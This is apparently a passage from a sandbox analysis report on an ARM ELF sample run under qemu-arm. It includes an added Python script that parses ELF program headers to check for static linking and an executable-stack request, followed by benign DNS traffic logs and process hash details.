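"""Parse the program headers of an ELF32 LE image and answer the two questions
this report's table raises: is a dynamic loader involved, and what stack
permissions does the binary request. Added example, not code from the sample or
Joe Sandbox. REPORT_PHDRS copies the numbers from the report; the p_type of the
first and last entries (ARM_EXIDX, GNU_STACK) is an assumption, see the text."""
import struct

ELF_MAGIC = b"\x7fELF"
EHDR_FMT = "<HHIIIIIHHHHHH"  # Elf32_Ehdr after the 16-byte e_ident, little endian
PHDR_FMT = "<IIIIIIII"       # Elf32_Phdr

PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3
PT_GNU_STACK = 0x6474E551
PT_ARM_EXIDX = 0x70000001
PT_NAMES = {0: "NULL", PT_LOAD: "LOAD", PT_DYNAMIC: "DYNAMIC", PT_INTERP: "INTERP",
            PT_GNU_STACK: "GNU_STACK", PT_ARM_EXIDX: "ARM_EXIDX"}
PF_X, PF_W, PF_R = 1, 2, 4

# (p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align)
# from the report's program-header table; the two non-LOAD types are assumed.
REPORT_PHDRS = [
    (PT_ARM_EXIDX, 0x19954, 0x21954, 0x21954, 0xC8, 0xC8, PF_R, 0x4),
    (PT_LOAD, 0x0, 0x8000, 0x8000, 0x19A1C, 0x19A1C, PF_R | PF_X, 0x8000),
    (PT_LOAD, 0x1A000, 0x2A000, 0x2A000, 0xD0, 0x4858, PF_R | PF_W, 0x8000),
    (PT_GNU_STACK, 0, 0, 0, 0, 0, PF_R | PF_W | PF_X, 0x4),
]


def build_elf32_arm_header(phdrs, e_entry=0x816C, e_flags=0x4000002):
    """Construct a minimal ELF32 LE ARM image: the 52-byte header followed by
    the program-header table at offset 52 (no section table is emitted)."""
    e_ident = ELF_MAGIC + bytes([1, 1, 1, 0]) + bytes(8)  # ELFCLASS32, LSB, EV_CURRENT, SYSV
    ehdr = e_ident + struct.pack(EHDR_FMT, 2, 40, 1, e_entry, 52, 0, e_flags,
                                 52, 32, len(phdrs), 40, 0, 0)  # ET_EXEC, EM_ARM
    return ehdr + b"".join(struct.pack(PHDR_FMT, *p) for p in phdrs)


def parse_program_headers(blob):
    """Walk the program-header table of an ELF32 little-endian image."""
    if blob[:4] != ELF_MAGIC or blob[4] != 1 or blob[5] != 1:
        raise ValueError("not an ELF32 little-endian image")
    (_, _, _, _, e_phoff, _, _, _, e_phentsize, e_phnum,
     _, _, _) = struct.unpack_from(EHDR_FMT, blob, 16)
    out = []
    for i in range(e_phnum):
        p_type, off, vaddr, _paddr, filesz, memsz, flags, align = struct.unpack_from(
            PHDR_FMT, blob, e_phoff + i * e_phentsize)
        out.append({"type": PT_NAMES.get(p_type, hex(p_type)), "offset": off,
                    "vaddr": vaddr, "filesz": filesz, "memsz": memsz, "align": align,
                    "flags": "".join(c if flags & bit else " "
                                     for c, bit in (("R", PF_R), ("W", PF_W), ("E", PF_X)))})
    return out


def summarize(phdrs):
    """No INTERP/DYNAMIC entry means no loader and no dynamic section; the
    GNU_STACK flags are the binary's request for stack permissions; a LOAD
    segment that is both writable and executable would be a further red flag."""
    types = [p["type"] for p in phdrs]
    stack = next((p for p in phdrs if p["type"] == "GNU_STACK"), None)
    return {
        "statically_linked": "INTERP" not in types and "DYNAMIC" not in types,
        "executable_stack": stack is not None and "E" in stack["flags"],
        "wx_load_segments": [p["vaddr"] for p in phdrs
                             if p["type"] == "LOAD" and {"W", "E"} <= set(p["flags"])],
    }


HEADERS = parse_program_headers(build_elf32_arm_header(REPORT_PHDRS))

if __name__ == "__main__":
    for h in HEADERS:
        print(f"{h['type']:10} off=0x{h['offset']:x} vaddr=0x{h['vaddr']:x} "
              f"filesz=0x{h['filesz']:x} memsz=0x{h['memsz']:x} [{h['flags']}] align=0x{h['align']:x}")
    print(summarize(HEADERS))
```

Two results matter. No INTERP or DYNAMIC entry means no program interpreter and no dynamic section, so the "dynamically linked" wording in the file-type line is not borne out by the headers; and the GNU_STACK flags RWE ask the kernel for an executable stack. The memsz minus filesz of the second LOAD is 0x4788, exactly the .bss size in the section table, which is the usual sanity check that the two tables describe the same layout.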


Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Apr 2, 2025 11:48:17.200884104 CEST  43155        53         192.168.2.13  8.8.8.8
Apr 2, 2025 11:48:17.200949907 CEST  51062        53         192.168.2.13  8.8.8.8
Apr 2, 2025 11:48:17.295233965 CEST  53           43155      8.8.8.8       192.168.2.13
Apr 2, 2025 11:48:17.295275927 CEST  53           51062      8.8.8.8       192.168.2.13

DNS queries
Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
Apr 2, 2025 11:48:17.200884104 CEST  192.168.2.13  8.8.8.8  0x7240    Standard query (0)  daisy.ubuntu.com  A (IP address)  IN (0x0001)  false
Apr 2, 2025 11:48:17.200949907 CEST  192.168.2.13  8.8.8.8  0x454d    Standard query (0)  daisy.ubuntu.com  28 (AAAA)       IN (0x0001)  false

DNS answers
Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name              CName  Address        Type            Class        DNS over HTTPS
Apr 2, 2025 11:48:17.295233965 CEST  8.8.8.8    192.168.2.13  0x7240    No error (0)  daisy.ubuntu.com         162.213.35.24  A (IP address)  IN (0x0001)  false
Apr 2, 2025 11:48:17.295233965 CEST  8.8.8.8    192.168.2.13  0x7240    No error (0)  daisy.ubuntu.com         162.213.35.25  A (IP address)  IN (0x0001)  false

    System Behavior

    Start time (UTC):09:48:14
    Start date (UTC):02/04/2025
    Path:/tmp/arm6.elf
    Arguments:-
File size:4956856 bytes
MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
(size and hash of the executing image, not of the 107'324-byte submitted sample: the process is the qemu-arm user-mode emulator that loads /tmp/arm6.elf, as the "/usr/bin/qemu-arm/tmp/arm6.elf" memory string and the /etc/qemu-binfmt/arm entries show, and the same MD5 is reported for the process in the process tree at the top of the report)